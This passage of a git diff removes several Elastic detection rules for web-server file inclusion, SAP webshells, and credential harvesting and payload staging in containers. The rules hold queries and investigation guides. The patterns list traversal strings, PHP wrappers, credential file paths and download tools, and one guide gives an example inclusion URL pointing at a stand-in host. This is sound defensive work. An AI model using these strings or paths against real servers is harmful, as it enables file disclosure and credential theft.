pivoting to /proc/self/environ to harvest secrets and identify execution context for subsequent steps. - -### Possible investigation steps - -- Retrieve contiguous access logs around the alert to rebuild each request/response pair (URI, parameters, user agent, referer, cookies, X-Forwarded-For) and identify which parameter reflected traversal or wrapper usage and whether the response likely contained file contents. -- Compare response sizes and content-types for the suspicious requests to normal pages and look for signatures such as "root:x:" lines, INI/XML keys, or base64 blobs that indicate disclosure of /etc/passwd, web.config/applicationhost.config, or other sensitive files. -- Review web server and application error logs at the same timestamps for include/open stream warnings, open_basedir or allow_url_fopen messages, and stack traces to confirm the code path handling the input and any mitigations in place. -- Pivot on the same source and timeframe to find adjacent probes (php://filter, data://, expect://, zip://, phar://, /proc/self/environ, traversal into webroots/configs) and any follow-on POSTs to upload endpoints or new script paths, signaling progression toward RCE or webshell placement. -- Determine whether the traffic was authenticated and whether it traversed a WAF or reverse proxy by correlating cookies or session IDs and client IPs with proxy/WAF logs, noting any blocks, rule matches, or bypasses to bound scope and urgency. - -### False positive analysis - -- A site search or documentation endpoint echoing user-supplied text can include strings like ../../../../etc/passwd, windows/win.ini, or php://filter in the query string and return a normal 200 OK results page rather than performing a file include. -- An authenticated admin feature (such as a log viewer or file browser) may legitimately accept path= or file= parameters referencing local paths like /var/log/nginx or /inetpub/logs/logfiles and return 200 when serving allowed files, producing URLs that match the rule without exploitation. - -### Response and remediation - -- Immediately block the source IP at the reverse proxy/WAF and deploy deny rules for GET requests using ../../ or ..\\..\\ traversal or wrappers (php://, expect://, data://) that fetch /etc/passwd, /proc/self/environ, wp-config.php, web.config, or applicationhost.config. -- Configure the web server to return 403 for paths resolving to /proc, /etc, /var/log, /inetpub, applicationhost.config, and web.config and to reject wrapper schemes like php:// and expect://, then reload Nginx/Apache/IIS to apply. -- Fix the vulnerable include logic by canonicalizing input with realpath, rejecting any .. segments or absolute paths, enforcing a whitelist of allowed files, and in PHP disabling allow_url_include/allow_url_fopen and setting open_basedir to a safe directory. -- Rotate exposed secrets by changing database and API credentials from wp-config.php, connection strings and machine keys from web.config/applicationhost.config, and any tokens in /proc/self/environ, then invalidate active sessions and cache. -- Escalate to incident leadership and quarantine the host if response bodies contain credential patterns (e.g., "root:x:" from /etc/passwd or XML keys from web.config), if /etc/shadow or windows/system32/config/SAM was requested, or if follow-on POSTs or new .php/.aspx files appear in the webroot. -- Recover by verifying integrity of /var/www and /inetpub/wwwroot, scanning for webshells and unexpected includes, redeploying a known-good build or container image if tampering is found, and adding WAF normalization to double-decode URLs and 403 traversal attempts. -""" -risk_score = 21 -rule_id = "90e4ceab-79a5-4f8e-879b-513cac7fcad9" -severity = "low" -tags = ["Domain: Web", "Use Case: Threat Detection", "Tactic: Collection", "Tactic: Initial Access", "Data Source: Nginx", "Data Source: Apache", "Data Source: Apache Tomcat", "Data Source: IIS", "Data Source: Traefik", "Resources: Investigation Guide"] -timestamp_override = "event.ingested" -type = "esql" -query = ''' -from - logs-nginx.access-*, - logs-apache.access-*, - logs-apache_tomcat.access-*, - logs-iis.access-*, - logs-traefik.access-* -| where - http.request.method == "GET" and - http.response.status_code == 200 and - url.original like "*=*" - -| eval Esql.url_original_url_decoded_to_lower = to_lower(URL_DECODE(url.original)) - -| where - /* 1) Relative traversal */ - Esql.url_original_url_decoded_to_lower like "*../../../../*" or // Unix-style traversal - Esql.url_original_url_decoded_to_lower like "*..\\\\..\\\\..\\\\..*" or // Windows-style traversal - // Potential security check bypassing (enforcing multiple dots and shortening the pattern) - Esql.url_original_url_decoded_to_lower like "*..././*" or - Esql.url_original_url_decoded_to_lower like "*...\\*" or - Esql.url_original_url_decoded_to_lower like "*....\\*" or - - /* 2) Linux system identity / basic info */ - Esql.url_original_url_decoded_to_lower like "*etc/passwd*" or - Esql.url_original_url_decoded_to_lower like "*etc/shadow*" or - Esql.url_original_url_decoded_to_lower like "*etc/hosts*" or - Esql.url_original_url_decoded_to_lower like "*etc/os-release*" or - Esql.url_original_url_decoded_to_lower like "*etc/issue*" or - - /* 3) Linux /proc enumeration */ - Esql.url_original_url_decoded_to_lower like "*proc/self/environ*" or - Esql.url_original_url_decoded_to_lower like "*proc/self/cmdline*" or - Esql.url_original_url_decoded_to_lower like "*proc/self/fd*" or - Esql.url_original_url_decoded_to_lower like "*proc/self/exe*" or - - /* 4) Linux webroots, configs & logs */ - Esql.url_original_url_decoded_to_lower like "*var/www*" or // generic webroot - Esql.url_original_url_decoded_to_lower like "*wp-config.php*" or // classic WP config - Esql.url_original_url_decoded_to_lower like "*etc/apache2*" or - Esql.url_original_url_decoded_to_lower like "*etc/httpd*" or - Esql.url_original_url_decoded_to_lower like "*etc/nginx*" or - Esql.url_original_url_decoded_to_lower like "*var/log/apache2*" or - Esql.url_original_url_decoded_to_lower like "*var/log/httpd*" or - Esql.url_original_url_decoded_to_lower like "*var/log/nginx*" or - - /* 5) Windows core files / identity */ - Esql.url_original_url_decoded_to_lower like "*windows/panther/*unattend*" or - Esql.url_original_url_decoded_to_lower like "*windows/debug/netsetup.log*" or - Esql.url_original_url_decoded_to_lower like "*windows/win.ini*" or - Esql.url_original_url_decoded_to_lower like "*windows/system32/drivers/etc/hosts*" or - Esql.url_original_url_decoded_to_lower like "*boot.ini*" or - Esql.url_original_url_decoded_to_lower like "*windows/system32/config/*" or - Esql.url_original_url_decoded_to_lower like "*windows/repair/sam*" or - Esql.url_original_url_decoded_to_lower like "*windows/system32/license.rtf*" or - - /* 6) Windows IIS / .NET configs, webroots & logs */ - Esql.url_original_url_decoded_to_lower like "*/inetpub/wwwroot*" or - Esql.url_original_url_decoded_to_lower like "*/inetpub/logs/logfiles*" or - Esql.url_original_url_decoded_to_lower like "*applicationhost.config*" or - Esql.url_original_url_decoded_to_lower like "*/microsoft.net/framework64/*/config/web.config*" or - Esql.url_original_url_decoded_to_lower like "*windows/system32/inetsrv/*" or - - /* 7) PHP & protocol wrappers */ - Esql.url_original_url_decoded_to_lower like "*php://*" or - Esql.url_original_url_decoded_to_lower like "*zip://*" or - Esql.url_original_url_decoded_to_lower like "*phar://*" or - Esql.url_original_url_decoded_to_lower like "*expect://*" or - Esql.url_original_url_decoded_to_lower like "*file://*" or - Esql.url_original_url_decoded_to_lower like "*data://text/plain;base64*" - -| keep - @timestamp, - Esql.url_original_url_decoded_to_lower, - source.ip, - agent.id, - agent.name, - http.request.method, - http.response.status_code, - event.dataset, - data_stream.namespace - -| stats - Esql.event_count = count(), - Esql.url_original_url_decoded_to_lower_count_distinct = count_distinct(Esql.url_original_url_decoded_to_lower), - Esql.agent_name_values = values(agent.name), - Esql.agent_id_values = values(agent.id), - Esql.http_request_method_values = values(http.request.method), - Esql.http_response_status_code_values = values(http.response.status_code), - Esql.url_original_url_decoded_to_lower_values = values(Esql.url_original_url_decoded_to_lower), - Esql.event_dataset_values = values(event.dataset), - Esql.data_stream_namespace_values = values(data_stream.namespace) - by source.ip -''' - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1190" -name = "Exploit Public-Facing Application" -reference = "https://attack.mitre.org/techniques/T1190/" - -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1005" -name = "Data from Local System" -reference = "https://attack.mitre.org/techniques/T1005/" - -[rule.threat.tactic] -id = "TA0009" -name = "Collection" -reference = "https://attack.mitre.org/tactics/TA0009/" diff --git a/rules/cross-platform/initial_access_web_server_remote_file_inclusion_activity.toml b/rules/cross-platform/initial_access_web_server_remote_file_inclusion_activity.toml deleted file mode 100644 index 4db561f9f8f..00000000000 --- a/rules/cross-platform/initial_access_web_server_remote_file_inclusion_activity.toml +++ /dev/null @@ -1,116 +0,0 @@ -[metadata] -creation_date = "2025/12/02" -integration = ["nginx", "apache", "apache_tomcat", "iis", "traefik"] -maturity = "production" -min_stack_version = "9.2.0" -min_stack_comments = "The esql url_decode() operator was introduced in version 9.2.0" -updated_date = "2026/03/23" - -[rule] -author = ["Elastic"] -description = """ -This rule detects potential Remote File Inclusion (RFI) activity on web servers by identifying HTTP GET requests that -attempt to access sensitive remote files through directory traversal techniques or known file paths. Attackers may -exploit RFI vulnerabilities to read sensitive files, gain system information, or further compromise the server. -""" -from = "now-11m" -interval = "10m" -language = "esql" -license = "Elastic License v2" -name = "Web Server Potential Remote File Inclusion Activity" -note = """## Triage and analysis - -> **Disclaimer**: -> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. - -### Investigating Web Server Potential Remote File Inclusion Activity - -This rule identifies successful GET requests that pass a remote URL or raw IP in a parameter, signaling Remote File Inclusion attempts that coerce the app to fetch external content or reveal local files. RFI matters because it enables discovery, leaks sensitive data, and can bootstrap code retrieval for persistence or command-and-control. Example behavior: probing an include endpoint with /index.php?page=http://203.0.113.10/drop.txt to verify remote fetch and execution via a vulnerable loader. - -### Possible investigation steps - -- Decode the full request URL and parameters, identify the endpoint and parameter names, and confirm with application owners whether passing remote URLs is expected behavior for that route. -- Correlate the event time with outbound connections from the web server to the referenced domain or IP using egress firewall, proxy, DNS, or NetFlow logs to verify whether a fetch occurred. -- Review adjacent web access entries from the same source IP and user agent to detect scanning behavior, varied include parameters, wrapper strings (php://, data://, file://), or local file probes that indicate exploitation attempts. -- Check the referenced remote domain or IP with threat intelligence, and if needed, safely retrieve it in an isolated environment to examine content, redirects, and headers for droppers or callbacks. -- Look for post-inclusion artifacts by checking webroot and temp directories for newly created or modified files, suspicious script writes, and unusual access patterns, and inspect server or application configuration for risky URL include settings. - -### False positive analysis - -- Applications that legitimately accept full URLs in query parameters for link previews, content proxies, image fetching, or feed importers (e.g., url= or src=) will return 200 and match *=http(s)://*, appearing as RFI despite expected behavior. -- Administrative or diagnostic endpoints that allow users to supply IP addresses or URI schemes (ftp://, smb://, file://) to test connectivity or preview resources (e.g., target=192.168.1.10) can return 200 and trigger this rule even though no inclusion vulnerability is present. - -### Response and remediation - -- Immediately block offending source IPs and request patterns at the WAF/reverse proxy (e.g., GETs where page=, url=, or src= contains http://, https://, ftp://, smb://, or file://) and temporarily disable the affected include/loader endpoints until fixed. -- Restrict outbound connections from the web server to the domains and IPs referenced in the requests and quarantine the host if 200 OK responses align with remote downloads or wrapper usage such as php://, data://, file://. -- Collect forensic images, then remove newly created or modified scripts in webroot and temp directories (e.g., /var/www, uploads, /tmp), delete unauthorized .htaccess/web.config entries, clear caches, and terminate suspicious processes running under the web server account. -- Redeploy the application from a known-good build, restore clean configuration files, rotate credentials exposed by local file probes (e.g., config.php, .env), invalidate sessions, and verify functionality before returning the service to production. -- Harden by disabling risky features and enforcing strict input controls: set PHP allow_url_include=Off and allow_url_fopen=Off, apply open_basedir restrictions, implement scheme/domain allowlists for any include/load functionality, and sanitize and normalize user-supplied parameters. -- Escalate to incident response and preserve disk and memory images if remote content was fetched and executed, a webshell or unknown script is found in the webroot, or the same actor generates successful 200 RFI-style requests across multiple hosts. -- Enhance monitoring for RFI attempts by tuning WAF rules to alert on suspicious include parameters, enabling detailed web server logging, and setting up alerts for anomalous outbound connections from web servers. -""" -risk_score = 21 -rule_id = "45d099b4-a12e-4913-951c-0129f73efb41" -severity = "low" -tags = ["Domain: Web", "Use Case: Threat Detection", "Tactic: Initial Access", "Data Source: Nginx", "Data Source: Apache", "Data Source: Apache Tomcat", "Data Source: IIS", "Data Source: Traefik", "Resources: Investigation Guide"] -timestamp_override = "event.ingested" -type = "esql" -query = ''' -from - logs-nginx.access-*, - logs-apache.access-*, - logs-apache_tomcat.access-*, - logs-iis.access-*, - logs-traefik.access-* -| where - http.request.method == "GET" and - http.response.status_code == 200 and - url.original like "*=*" - -| eval Esql.url_original_url_decoded_to_lower = to_lower(URL_DECODE(url.original)) - -| where - Esql.url_original_url_decoded_to_lower like "*=http://*" or - Esql.url_original_url_decoded_to_lower like "*=https://*" or - Esql.url_original_url_decoded_to_lower like "*=ftp://*" or - Esql.url_original_url_decoded_to_lower like "*=smb://*" or - Esql.url_original_url_decoded_to_lower like "*=file://*" or - Esql.url_original_url_decoded_to_lower rlike """.*=.*[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}.*""" - -| keep - @timestamp, - Esql.url_original_url_decoded_to_lower, - source.ip, - agent.id, - agent.name, - http.request.method, - http.response.status_code, - event.dataset, - data_stream.namespace - -| stats - Esql.event_count = count(), - Esql.url_original_url_decoded_to_lower_count_distinct = count_distinct(Esql.url_original_url_decoded_to_lower), - Esql.agent_name_values = values(agent.name), - Esql.agent_id_values = values(agent.id), - Esql.http_request_method_values = values(http.request.method), - Esql.http_response_status_code_values = values(http.response.status_code), - Esql.url_original_url_decoded_to_lower_values = values(Esql.url_original_url_decoded_to_lower), - Esql.event_dataset_values = values(event.dataset), - Esql.data_stream_namespace_values = values(data_stream.namespace) - by source.ip -''' - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1190" -name = "Exploit Public-Facing Application" -reference = "https://attack.mitre.org/techniques/T1190/" - -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" diff --git a/rules/cross-platform/persistence_sap_netweaver_jsp_webshell.toml b/rules/cross-platform/persistence_sap_netweaver_jsp_webshell.toml deleted file mode 100644 index 143cd14ba11..00000000000 --- a/rules/cross-platform/persistence_sap_netweaver_jsp_webshell.toml +++ /dev/null @@ -1,75 +0,0 @@ -[metadata] -creation_date = "2025/04/26" -integration = ["endpoint"] -maturity = "production" -updated_date = "2026/03/23" - -[rule] -author = ["Elastic"] -description = """ -Identifies suspicious Java file creation in the IRJ directory of the SAP NetWeaver application. This may indicate an attempt to deploy a webshell. -""" -from = "now-9m" -index = ["auditbeat-*", "logs-endpoint.events.file*"] -language = "eql" -license = "Elastic License v2" -name = "Potential SAP NetWeaver WebShell Creation" -references = [ - "https://reliaquest.com/blog/threat-spotlight-reliaquest-uncovers-vulnerability-behind-sap-netweaver-compromise/", - "https://onapsis.com/blog/active-exploitation-of-sap-vulnerability-cve-2025-31324/" -] -risk_score = 73 -rule_id = "f7d588ba-e4b0-442e-879d-7ec39fbd69c5" -severity = "high" -tags = ["Domain: Endpoint", "OS: Linux", "OS: Windows", "Use Case: Threat Detection", "Use Case: Vulnerability", "Tactic: Persistence", "Data Source: Elastic Defend", "Resources: Investigation Guide"] -timestamp_override = "event.ingested" -type = "eql" - -query = ''' -file where host.os.type in ("linux", "windows") and event.action == "creation" and - file.extension : ("jsp", "java", "class") and - file.path : ("/*/sap.com/*/servlet_jsp/irj/root/*", - "/*/sap.com/*/servlet_jsp/irj/work/*", - "?:\\*\\sap.com\\*\\servlet_jsp\\irj\\root\\*", - "?:\\*\\sap.com\\*\\servlet_jsp\\irj\\work\\*") -''' -note = """## Triage and analysis - -### Investigating Potential SAP NetWeaver WebShell Creation - -### Possible investigation steps - -- Examine the file creation event and the associated HTTP post request logs details to identify the source of the creation. -- Examine the process tree to verify the parent-child relationship between the Java process and any suspicious child processes such as shell scripts or scripting languages (e.g., sh, bash, curl, python). -- Check the command line arguments and environment variables of the suspicious child processes to identify any potentially malicious payloads or commands being executed. -- Investigate the host's recent activity and logs for any other indicators of compromise or unusual behavior that might correlate with the suspected exploitation attempt. -- Assess the system for any unauthorized changes or new files that may have been introduced as a result of the exploitation attempt, focusing on JSP files under the IRJ root directory. - - -### Response and remediation - -- Immediately isolate the affected host from the network to prevent further outbound connections and potential lateral movement. -- Terminate any suspicious Java processes identified in the alert, especially those making outbound connections to LDAP, RMI, or DNS ports. -- Conduct a thorough review of the affected system for any unauthorized changes or additional malicious processes, focusing on child processes like shell scripts or scripting languages. -- Restore the affected system from a known good backup if unauthorized changes or malware are detected. -- Update and patch Java and any related applications to the latest versions to mitigate known vulnerabilities. -- Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to assess the potential impact on other systems within the network.""" - - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1505" -name = "Server Software Component" -reference = "https://attack.mitre.org/techniques/T1505/" - -[[rule.threat.technique.subtechnique]] -id = "T1505.003" -name = "Web Shell" -reference = "https://attack.mitre.org/techniques/T1505/003/" - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/integrations/cloud_defend/collection_collection_sensitive_files_compression_inside_a_container.toml b/rules/integrations/cloud_defend/collection_collection_sensitive_files_compression_inside_a_container.toml deleted file mode 100644 index a2427964654..00000000000 --- a/rules/integrations/cloud_defend/collection_collection_sensitive_files_compression_inside_a_container.toml +++ /dev/null @@ -1,141 +0,0 @@ -[metadata] -creation_date = "2023/05/12" -integration = ["cloud_defend"] -maturity = "production" -min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" -min_stack_version = "9.3.0" -updated_date = "2026/03/23" - -[rule] -author = ["Elastic"] -description = """ -Identifies the use of a compression utility to collect known files containing sensitive information, such as credentials -and system configurations inside a container. -""" -from = "now-6m" -index = ["logs-cloud_defend.process*"] -interval = "5m" -language = "eql" -license = "Elastic License v2" -name = "Sensitive File Compression Detected via Defend for Containers" -note = """## Setup - -## Triage and analysis - -> **Disclaimer**: -> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. - -### Investigating Sensitive File Compression Detected via Defend for Containers - -Containers are lightweight, portable environments used to run applications consistently across different systems. Adversaries may exploit compression utilities within containers to gather and exfiltrate sensitive files, such as credentials and configuration files. The detection rule identifies suspicious compression activities by monitoring for specific utilities and file paths, flagging potential unauthorized data collection attempts. - -### Possible investigation steps - -- Review the process details to confirm the use of compression utilities such as zip, tar, gzip, hdiutil, or 7z within the container environment, focusing on the process.name and process.args fields. -- Examine the specific file paths listed in the process.args to determine if they include sensitive files like SSH keys, AWS credentials, or Docker configurations, which could indicate unauthorized data collection. -- Identify the container.id associated with the alert to gather more context about the container's purpose, owner, and any recent changes or deployments that might explain the activity. -- Check the event.type field for "start" to verify the timing of the process initiation and correlate it with any known legitimate activities or scheduled tasks within the container. -- Investigate the user or service account under which the process was executed to assess whether it has the necessary permissions and if the activity aligns with expected behavior for that account. -- Look for any related alerts or logs that might indicate a broader pattern of suspicious activity within the same container or across other containers in the environment. - -### False positive analysis - -- Routine backup operations may trigger the rule if they involve compressing sensitive files for storage. To handle this, identify and exclude backup processes or scripts that are known and trusted. -- Automated configuration management tools might compress configuration files as part of their normal operation. Exclude these tools by specifying their process names or paths in the exception list. -- Developers or system administrators might compress sensitive files during legitimate troubleshooting or maintenance activities. Establish a process to log and review these activities, and exclude them if they are verified as non-threatening. -- Continuous integration and deployment pipelines could involve compressing configuration files for deployment purposes. Identify these pipelines and exclude their associated processes to prevent false positives. -- Security tools that perform regular audits or scans might compress files for analysis. Ensure these tools are recognized and excluded from triggering the rule. - -### Response and remediation - -- Immediately isolate the affected container to prevent further data exfiltration or unauthorized access. This can be done by stopping the container or disconnecting it from the network. -- Conduct a thorough review of the compressed files and their contents to assess the extent of sensitive data exposure. Focus on the specific file paths identified in the alert. -- Change credentials and keys that may have been compromised, including SSH keys, AWS credentials, and Docker configurations. Ensure that new credentials are distributed securely. -- Review and update access controls and permissions for sensitive files within containers to minimize exposure. Ensure that only necessary processes and users have access to these files. -- Implement monitoring and alerting for similar compression activities in other containers to detect potential threats early. Use the identified process names and arguments as indicators. -- Escalate the incident to the security operations team for further investigation and to determine if additional systems or data have been affected. -- Conduct a post-incident review to identify gaps in security controls and update container security policies to prevent recurrence.""" -risk_score = 47 -rule_id = "475b42f0-61fb-4ef0-8a85-597458bfb0a1" -severity = "medium" -tags = [ - "Data Source: Elastic Defend for Containers", - "Domain: Container", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Collection", - "Tactic: Credential Access", - "Resources: Investigation Guide", -] -timestamp_override = "event.ingested" -type = "eql" -query = ''' -process where host.os.type == "linux" and event.type == "start" and event.action == "exec" and ( - process.name in ("zip", "tar", "gzip", "hdiutil", "7z", "rar", "7zip", "p7zip") or - ( - /* account for tools that execute utilities as a subprocess, in this case the target utility name will appear as a process arg */ - process.name in ("bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish", "busybox") and - process.args in ( - "zip", "/bin/zip", "/usr/bin/zip", "/usr/local/bin/zip", - "tar", "/bin/tar", "/usr/bin/tar", "/usr/local/bin/tar", - "gzip", "/bin/gzip", "/usr/bin/gzip", "/usr/local/bin/gzip", - "hdiutil", "/bin/hdiutil", "/usr/bin/hdiutil", "/usr/local/bin/hdiutil", - "7z", "/bin/7z", "/usr/bin/7z", "/usr/local/bin/7z", - "rar", "/bin/rar", "/usr/bin/rar", "/usr/local/bin/rar", - "7zip", "/bin/7zip", "/usr/bin/7zip", "/usr/local/bin/7zip", - "p7zip", "/bin/p7zip", "/usr/bin/p7zip", "/usr/local/bin/p7zip" - ) and - /* default exclusion list to not FP on default multi-process commands */ - not process.args in ( - "which", "/bin/which", "/usr/bin/which", "/usr/local/bin/which", - "man", "/bin/man", "/usr/bin/man", "/usr/local/bin/man", - "chmod", "/bin/chmod", "/usr/bin/chmod", "/usr/local/bin/chmod", - "chown", "/bin/chown", "/usr/bin/chown", "/usr/local/bin/chown" - ) - ) -) and -process.args like~ ( - "*/root/.ssh/*", "*/home/*/.ssh/*", "*/root/.bash_history*", "*/etc/hosts*", "*/root/.aws/*", "*/home/*/.aws/*", - "*/root/.docker/*", "*/home/*/.docker/*", "*/etc/group*", "*/etc/passwd*", "*/etc/shadow*", "*/etc/gshadow*", - "*/.azure/*", "*/var/run/secrets/azure/*", "*/.config/gcloud/*", "*application_default_credentials.json*", - "*type: service_account*", "*client_email*", "*private_key_id*", "*private_key*", "*/var/run/secrets/google/*", - "*GOOGLE_APPLICATION_CREDENTIALS*", "*AZURE_CLIENT_ID*", "*AZURE_TENANT_ID*", "*AZURE_CLIENT_SECRET*", - "*AZURE_FEDERATED_TOKEN_FILE*", "*IDENTITY_ENDPOINT*", "*IDENTITY_HEADER*", "*MSI_ENDPOINT*", "*MSI_SECRET*" -) and process.interactive == true and container.id like "*" -''' - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1560" -name = "Archive Collected Data" -reference = "https://attack.mitre.org/techniques/T1560/" - -[[rule.threat.technique.subtechnique]] -id = "T1560.001" -name = "Archive via Utility" -reference = "https://attack.mitre.org/techniques/T1560/001/" - -[rule.threat.tactic] -id = "TA0009" -name = "Collection" -reference = "https://attack.mitre.org/tactics/TA0009/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1552" -name = "Unsecured Credentials" -reference = "https://attack.mitre.org/techniques/T1552/" - -[[rule.threat.technique.subtechnique]] -id = "T1552.001" -name = "Credentials In Files" -reference = "https://attack.mitre.org/techniques/T1552/001/" - -[rule.threat.tactic] -id = "TA0006" -name = "Credential Access" -reference = "https://attack.mitre.org/tactics/TA0006/" diff --git a/rules/integrations/cloud_defend/command_and_control_file_creation_execution_deletion_sequence.toml b/rules/integrations/cloud_defend/command_and_control_file_creation_execution_deletion_sequence.toml deleted file mode 100644 index a9a634d7f81..00000000000 --- a/rules/integrations/cloud_defend/command_and_control_file_creation_execution_deletion_sequence.toml +++ /dev/null @@ -1,147 +0,0 @@ -[metadata] -creation_date = "2026/03/05" -integration = ["cloud_defend"] -maturity = "production" -min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" -min_stack_version = "9.3.0" -updated_date = "2026/03/23" - -[rule] -author = ["Elastic"] -description = """ -This rule detects the creation, execution, and deletion of files inside a container, a common -technique used by attackers to evade detection. -""" -from = "now-6m" -index = ["logs-cloud_defend.process*", "logs-cloud_defend.file*"] -interval = "5m" -language = "eql" -license = "Elastic License v2" -name = "Ingress Tool Transfer Followed by Execution and Deletion Detected via Defend for Containers" -note = """## Triage and analysis - -> **Disclaimer**: -> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. - -### Investigating Ingress Tool Transfer Followed by Execution and Deletion Detected via Defend for Containers - -This detection flags a rapid sequence inside a container where a file is written to a common transient or user-writable location, executed, then deleted shortly after—an evasion pattern meant to minimize on-disk artifacts and frustrate forensic review. Attackers often use a shell to pull a payload with common transfer utilities into `/tmp` or shared memory, run it immediately for credential theft or lateral movement, and then remove it to blend back into normal container churn. - -### Possible investigation steps - -- Pivot on the container to review the full process tree and preceding commands around the sequence to determine how the payload was introduced (interactive shell, entrypoint, cron, CI job, or exploited service) and what else executed nearby in time. -- Retrieve the file content if still present or recover it from container runtime logs/snapshots/registry layers, then compute hashes and run static/dynamic analysis to identify malware family, network indicators, and persistence or credential-access behavior. -- Review outbound network connections from the container during the same window to identify download sources, callback infrastructure, and any subsequent lateral movement attempts to internal services. -- Check whether the container or pod is running with elevated privileges (host mounts, privileged mode, sensitive service account tokens, or access to Docker/CRI sockets) to assess host-escape risk and scope potential impact beyond the container. -- Validate legitimacy by correlating with recent deploys/build steps and expected package/install activity, and if suspicious, isolate the workload and rotate any exposed secrets or tokens used by the container. - -### False positive analysis - -- A container entrypoint or bootstrap script downloads a small helper or configuration artifact into `/tmp` (or similar), executes it via a shell to perform initialization checks or configuration, and then deletes it immediately to keep the runtime filesystem clean. -- A build/test step running inside a container fetches transient binaries or linkable objects (e.g., via `curl`/`wget`/`scp` or `ld`) into writable paths like `/tmp` or `/opt`, executes them as part of compilation or validation, and removes them as part of routine cleanup. - -### Response and remediation - -- Quarantine the affected pod or container by isolating it from the network and scaling it to zero or killing the container while preserving a copy of the writable layer and runtime logs for forensic analysis. -- Identify and block the download and command-and-control endpoints used by the transfer utility (for example the `curl`/`wget` URL or `scp` destination) at egress controls, then search for the same indicator across other workloads and nodes to find additional compromised containers. -- Eradicate by rebuilding and redeploying the workload from a known-good image and clean source, removing any unauthorized startup scripts or injected binaries in paths like `/tmp`, `/dev/shm`, `/var/tmp`, `/root`, or `/opt`. -- Rotate and revoke any credentials the container could access such as Kubernetes service account tokens, API keys, registry credentials, and mounted secrets, and invalidate sessions if the executed payload could have harvested them. -- Escalate to incident response immediately if the workload was privileged, had hostPath mounts or container runtime socket access, touched `/proc/*/fd/*`, or showed signs of data access or lateral movement to internal services. -- Harden by enforcing least privilege and runtime controls such as read-only root filesystems, no shell or download tools in production images, restricted egress allowlists, and admission policies that block privileged pods and sensitive host mounts. -""" -references = [ - "https://flare.io/learn/resources/blog/teampcp-cloud-native-ransomware", -] -risk_score = 73 -rule_id = "1dc56174-5d02-4ca4-af92-e391f096fb21" -severity = "high" -tags = ["Tactic: Command and Control", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: Elastic Defend for Containers", "Domain: Container", "OS: Linux", "Use Case: Threat Detection", "Resources: Investigation Guide"] -timestamp_override = "event.ingested" -type = "eql" -query = ''' -sequence by container.id, user.id with maxspan=10s - [file where event.action == "creation" and ( - process.name in ("curl", "wget", "fetch", "ftp", "sftp", "scp", "rsync", "ld") or - ( - process.name in ("bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish", "busybox") and - process.args in ( - "curl", "/bin/curl", "/usr/bin/curl", "/usr/local/bin/curl", - "wget", "/bin/wget", "/usr/bin/wget", "/usr/local/bin/wget", - "fetch", "/bin/fetch", "/usr/bin/fetch", "/usr/local/bin/fetch", - "ftp", "/bin/ftp", "/usr/bin/ftp", "/usr/local/bin/ftp", - "sftp", "/bin/sftp", "/usr/bin/sftp", "/usr/local/bin/sftp", - "scp", "/bin/scp", "/usr/bin/scp", "/usr/local/bin/scp", - "rsync", "/bin/rsync", "/usr/bin/rsync", "/usr/local/bin/rsync", - "ld", "/bin/ld", "/usr/bin/ld", "/usr/local/bin/ld" - ) and - /* default exclusion list to not FP on default multi-process commands */ - not process.args in ( - "which", "/bin/which", "/usr/bin/which", "/usr/local/bin/which", - "man", "/bin/man", "/usr/bin/man", "/usr/local/bin/man", - "chmod", "/bin/chmod", "/usr/bin/chmod", "/usr/local/bin/chmod", - "chown", "/bin/chown", "/usr/bin/chown", "/usr/local/bin/chown" - ) - ) - ) and file.path like ( - "/dev/shm/*", "/run/shm/*", "/tmp/*", "/var/tmp/*", "/run/*", "/var/run/*", "/var/www/*", - "/proc/*/fd/*", "/home/*/*", "/root/*", "/opt/*" - ) - ] by file.name - [process where event.type == "start" and event.action == "exec" and - process.parent.name in ("bash", "dash", "ash", "sh", "tcsh", "csh", "zsh", "ksh", "fish", "busybox") - ] by process.name - [file where event.action == "deletion" and file.path like ( - "/dev/shm/*", "/run/shm/*", "/tmp/*", "/var/tmp/*", "/run/*", "/var/run/*", "/var/www/*", - "/proc/*/fd/*", "/home/*/*", "/root/*", "/opt/*" - ) and not process.name in ("rm", "ld", "conftest", "link", "gcc", "getarch", "ld") - ] by file.name -''' - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1105" -name = "Ingress Tool Transfer" -reference = "https://attack.mitre.org/techniques/T1105/" - -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1070" -name = "Indicator Removal" -reference = "https://attack.mitre.org/techniques/T1070/" - -[[rule.threat.technique.subtechnique]] -id = "T1070.004" -name = "File Deletion" -reference = "https://attack.mitre.org/techniques/T1070/004/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = 